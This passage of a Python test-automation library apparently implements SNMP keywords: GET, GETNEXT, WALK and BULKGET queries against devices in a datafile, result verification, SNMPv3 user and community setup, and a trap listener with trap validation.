usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
        14.custom_mib_paths: User can provide multiple MIB source paths separated by comma (',')
           A source path can be a URL or just an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded
from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates the SNMP
engine error.
2.errstatus: If this element evaluates to True, it indicates an
error in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error. The object position in the result
array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus,\
errindex, result = cmdgen.getCmd(auth_data, transport, oid)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET command {}"
.format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}"
.format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
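    # Illustrative usage of snmp_get (a sketch with made-up values; 'dut1' must define
    # ip/snmp_port in the input datafile):
    #   status, out = self.snmp_get(snmp_ver='2c', system_name='dut1',
    #                               oid_string='1.3.6.1.2.1.1.1.0', communityname='public')
    #   var_binds = out['dut1_result']   # list of (name, value) tuples on success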
def snmp_getnext(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, max_rows=1,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None):
"""
snmp_get_next uses the SNMP GETNEXT request to query for information
on a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
        2. snmp_ver: SNMP version; supported values are 1 (v1), 2 or 2c (v2c) and 3 (v3)
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
        8. snmp_timeout: Number of seconds the SNMP manager will wait for a
           response from the SNMP Agent. For SNMP walk this may need to
           be set higher.
        9.max_rows: The default value is 1; increase it to retrieve more GETNEXT
           rows starting from the given OID or MIB value.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocols(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2)'
        15.custom_mib_paths: User can provide multiple MIB source paths separated by comma (',')
           A source path can be a URL or just an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_module: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path".It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GETNEXT command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.nextCmd(auth_data,
transport, oid,
ignoreNonIncreasingOid=True, maxRows=int(max_rows),
lookupNames=True, lookupValues=True, lexicographicMode=True)
# maxRows=1 will control the mib walk
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET-NEXT "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {} {} xyz".
format(result, errindication, errstatus, errindex), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET-Next command Failed! \n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_walk(self, snmp_ver, system_name, mib_name=None, mib_index=None,
mib_value=None, oid_string=None, communityname=None,
snmp_timeout=60, userName=None, authKey=None, privKey=None,
authProtocol=None, privProtocol=None, custom_mib_paths=None,
load_mib_modules=None, lexicographicMode="False"):
"""
snmp_walk uses the SNMP WALK request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
        2. snmp_ver: SNMP version; supported values are 1 (v1), 2 or 2c (v2c) and 3 (v3)
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
        8. snmp_timeout: Number of seconds the SNMP manager will wait for a
           response from the SNMP Agent. For SNMP walk this may need to
           be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
        14.custom_mib_paths: User can provide multiple MIB source paths separated by comma (',')
           A source path can be a URL or just an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path". It is a string of MIB names separated by comma(',')
        16.lexicographicMode : "True" will return everything under the given prefix plus the next
           table as well, e.g. a request for 1.3.6.1 will also return 1.3.6.2.
           "False" will return only entries under the given prefix. The default is False.
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP WALK command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string: #OID String is optional
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index)
try:
errindication, errstatus, errindex,\
result = cmdgen.nextCmd(auth_data,
transport,
oid, lexicographicMode=ast.literal_eval(lexicographicMode.
capitalize()),
ignoreNonIncreasingOid=True, maxRows=50000,
lookupNames=True, lookupValues=True)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP WALK command {}".
format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {}".
format(result, errindication.prettyPrint(),
errstatus.prettyPrint()), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP Walk command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_bulkget(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, nonrepeaters='0', maxrepetitions='10',
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None,
lexicographicMode="False"):
"""
snmp_bulkget uses the SNMP BULKGET request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
        2. snmp_ver: SNMP version; supported values are 1 (v1), 2 or 2c (v2c) and 3 (v3)
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
        9. snmp_timeout: Number of seconds the SNMP manager will wait for a
           response from the SNMP Agent. For SNMP walk this may need to
           be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
        15.custom_mib_paths: User can provide multiple MIB source paths separated by comma (',')
           A source path can be a URL or just an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_modules: User can provide the MIBS(name) need to be loaded from the
path "custom_mib_path".
It is a string of MIB names separated by comma(',')
        17.lexicographicMode : "True" will return everything under the given prefix plus the next
            table as well, e.g. a request for 1.3.6.1 will also return 1.3.6.2.
            "False" will return only entries under the given prefix. The default is False.
18. maxrepetitions: This specifies the maximum number of iterations over the
repeating variables. The default is 10.
19. nonrepeaters : This specifies the number of supplied variables that should not be
iterated over. default is 0
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP BULKGET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol, privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit()
else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.bulkCmd(auth_data,
transport, int(nonrepeaters), int(maxrepetitions), oid,
lookupNames=True, lookupValues=True,
lexicographicMode=ast.literal_eval(
lexicographicMode.capitalize()),
maxRows=int(maxrepetitions))
# nonrepeaters(1)(int): One MIB variable is requested in response
# for the first nonRepeaters MIB variables in request.
# maxRepetitions(25)(int): maxRepetitions MIB variables are
# requested in response for each of the remaining MIB variables in
# the request (e.g. excluding nonRepeaters). Remote SNMP engine may
# choose lesser value than requested.
output_dict = {
'{0}_errindication'.format(system_name): errindication,
'{0}_errstatus'.format(system_name): errstatus,
'{0}_errindex'.format(system_name): errindex,
'{0}_result'.format(system_name): result,
'{0}_custom_mib_paths'.format(system_name): temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name): load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP BULK GET "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}".
format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP BULK GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def verify_snmp_action(self, system_name, snmp_result, mib_string=None):
"""
Will Verify SNMP get/getnext/walk/getbulk actions.
:Datafile usage:
NA
:Arguments:
1. system_name(string) = Name of the system from the input datafile
2. mib_string(string) = MIB string
e.g.'SNMPv2-SMI::enterprises.3861.3.2.100.1.2.0'
3. result(string) = SNMP Output string
e.g. '1Finity-T100'
:Returns:
1. status(bool)
"""
wdesc = "Verify the SNMP Action Results"
Utils.testcase_Utils.pSubStep(wdesc)
errindication = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errindication")
varBindTable = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_result")
errorstatus = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errstatus")
errindex = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errindex")
custom_mib_paths = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_custom_mib_paths")
load_mib_modules = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_load_mib_modules")
#Non-empty errorIndication string indicates SNMP engine-level error.
#The pair of errorStatus and errorIndex variables determines SNMP
#PDU-level error. If errorStatus evaluates to true, this indicates SNMP
#PDU error caused by Managed Object at position errorIndex-1 in \
#varBinds. Doing errorStatus.prettyPrint() would return an
# explanatory text error message.
result_list = []
status = False
if errindication:
testcase_Utils.pNote("%s" % errindication.prettyPrint())
else:
if errorstatus:
testcase_Utils.pNote('%s at %s' % (errorstatus.prettyPrint(),
errindex and
varBindTable[-1][int(errindex)-1][0]or '?'))
else:
if varBindTable:
if type(varBindTable[0]) is not list:
# for SNMP Get/Get-Next output only
for name, val in varBindTable:
result_list.append(snmp_utils.translate_mib(
custom_mib_paths, load_mib_modules, name, val))
else:
# for SNMP Getbulk/walk output only
for varBindTableRow in varBindTable:
for name, val in varBindTableRow:
result_list.append(snmp_utils.translate_mib(
custom_mib_paths, load_mib_modules, name, val))
else:
testcase_Utils.pNote("No SNMP Result Present!", 'error')
for element in result_list:
if mib_string:
if mib_string in element[0] and snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s and %s found in SNMP Output' %(
mib_string, snmp_result))
break
else:
if snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s Found! in SNMP Output' %(
snmp_result))
break
if status == False:
if mib_string:
testcase_Utils.pNote('{} and {} NOT Found in SNMP Output'.format(
mib_string, snmp_result))
else:
testcase_Utils.pNote('{} NOT Found in SNMP Output'.format(snmp_result))
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_v3_user(self, port, username, securityEngineId,
authkey=None, privkey=None,
authProtocol=None, privProtocol=None):
"""
Add SNMP V3 User for TRAP and Inform
Argument:
1. port: SNMP trap or inform port.
2. username(string) = snmp v3 username.
3. securityEngineId(string) = SNMP v3 secure engine id which is a mandatory
argument for any V3 user. both sender and
receiver should know this id.
refer: http://www.net-snmp.org/tutorial/tutorial-5
/commands/snmptrap-v3.html
4.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
5.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
6.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
7.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol,
usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
Return: True or False
"""
status = True
wdesc = "Add SNMP V3 User for TRAP and Inform"
Utils.testcase_Utils.pSubStep(wdesc)
status = ws.add_user(port, username, securityEngineId,
authkey, privkey, authProtocol, privProtocol)
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_community(self, port, community_string):
"""
Add the SNMP community string
:param port: SNMP TRAP or Inform PORT
:param community_string: SNMP community String
:return:
"""
status = True
status = ws.add_community(port, community_string)
Utils.testcase_Utils.report_substep_status(status)
return status
def start_trap_listener(self, system_name,
custom_mib_path=None,
load_mib_module='SNMPv2-MIB,SNMP-COMMUNITY-MIB'):
"""
        Start trap listener on the given port and IP address. It creates a socket
        with the given port and IP. The trap listener supports SNMP v1, v2c and v3.
Arguments:
system_name: SNMP Agents system name from the data file.
        custom_mib_path: User can provide multiple MIB source paths separated by comma (',')
            A source path can be a URL or just an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
load_mib_module: User can provide the MIBS(name) need to be loaded from the
path "custom_mib_path".
It is a string of MIB names separated by comma(',')
e.g. "FSS-COMMON-TC,FSS-COMMON-LOG,FSS-COMMON-SMI"
Data File Usage:
<ip> : Ip of the agent. It has to be IP not a hostname.
<snmp_port>: SNMP Port. UDP port e.g. 161 or 1036.
<snmp_trap_port> : SNMP trap port. UDP port e.g. 162 or any othe custom port.1036
if NESNMP or any other SNMP protocol is using the 162 port
please use any other port other than 162.
<community>: form this release community string is mandatory for v2 and v1 SNMP trap.
you can add multiple community like 'public,testing' or single like
'public'
<snmp_username>: For SNMP v3 this and engine id are mandatory argument.
e.g. 'user_snmp1234'
<securityEngineId>: One mandatory argument for V3 trap and inform.
e.g. '80000F150000000000000000'.
        For noAuthNoPriv none of the below attributes are required.
<authkey>: Auth password. e.g. 'authkey123'
<authProtocol>: authProtocol e.g. 'usmHMACMD5AuthProtocol'
authProtocol(string) = An indication of whether messages
sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
<privkey>: private key e.g. 'privkey1'
<privProtocol>: privProtocol e.g. 'usmDESPrivProtocol'
privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
Return: True or False
"""
status = True
wdesc = "Starting Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port', 'community', 'snmp_username',
'securityEngineId', 'authkey', 'privkey',
'authProtocol', 'privProtocol']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
community = snmp_param_dic.get('community', None)
username = snmp_param_dic.get('snmp_username', None)
securityEngineId = snmp_param_dic.get('securityEngineId', None)
privkey = snmp_param_dic.get('privkey', None)
authkey = snmp_param_dic.get('authkey', None)
authProtocol = snmp_param_dic.get('authProtocol', None)
privProtocol = snmp_param_dic.get('privProtocol', None)
engine = ws.get_asyncoredispatcher(port)
ntfrcv.NotificationReceiver(engine, ws.trap_decoder)
ws.data_repo.update({"custom_mib_path": custom_mib_path,
"load_mib_module": load_mib_module})
trap_listner_job = Thread(target=ws.create_trap_listner_job, args=(port, ))
trap_listner_job_start = Thread(target=ws.start_trap_listner_job, args=(port,))
trap_listner_job.daemon = True
trap_listner_job_start.daemon = True
trap_listner_job.start()
if community:
stats = ws.add_community(port, community)
status = status and stats
if username and securityEngineId:
stats = self.add_snmp_v3_user(port, username, securityEngineId, authkey, privkey,
authProtocol, privProtocol)
status = status and stats
sleep(1)
trap_listner_job_start.start()
sleep(2)
Utils.testcase_Utils.report_substep_status(status)
return status
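    # Illustrative trap workflow (a sketch; 'agent1' and the trap text are made-up examples,
    # and the datafile must define snmp_trap_port plus community or the v3 credentials):
    #   self.start_trap_listener('agent1')
    #   ... the agent sends a trap/notification ...
    #   self.show_received_traps('agent1')
    #   self.validate_trap('agent1', value='Administrative State Down')
    #   self.stop_trap_listener('agent1')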
def stop_trap_listener(self, system_name):
"""
Stop Trap listener job
Argument:
system_name: Agent system name given in the data file.
:return: Binary True or False
"""
status = True
wdesc = "Stop Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
stop_list = Thread(target=ws.close_trap_listner_job, args=(port,))
stop_list.daemon = True
stop_list.start()
stop_list.join()
Utils.testcase_Utils.report_substep_status(status)
return status
def validate_trap(self, system_name, value, oid_string=None, match_oid_op_value_pair="no"):
"""
This method will validate the Received traps from a agent.
Argument:
1. system_name: Agent System name from the data file
        2. value: The trap information e.g. 'Administrative State Down'
3. oid_string: MIB string e.g. 'FSS-COMMON-LOG::fssTrapDescription.0'
        4. match_oid_op_value_pair: if set to 'yes' it will match both
           oid_string and value as a pair. Default value is 'no'.
:return: Binary True or False
"""
stats = []
status = False
wdesc = "Validate the Received Trap Messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}"
.format(len(op_trap), agent_ip))
for temp_list in op_trap:
for items in temp_list[4:]:
if match_oid_op_value_pair.lower() == "no":
if value and value in items[1]:
testcase_Utils.pNote("Value# {} is present in: \n# {} = {}"
.format(value, items[0], items[1]))
stats.append(True)
break
elif oid_string and value:
if oid_string in items[0] and value in items[1]:
testcase_Utils.pNote("OID #{} and Value #{} is present in: \n# {} = {}"
.format(oid_string, value, items[0], items[1]))
stats.append(True)
break
if True in stats:
break
if True in stats:
break
else:
testcase_Utils.pNote("No Trap Received!", "error")
if True in stats:
status = True
else:
if value and oid_string:
testcase_Utils.pNote("OID #{} and Value #{} is NOT Present!"
.format(oid_string, value), "error")
else:
testcase_Utils.pNote("Value #{} is NOT present!".format(oid_string, value), "error")
Utils.testcase_Utils.report_substep_status(status)
return status
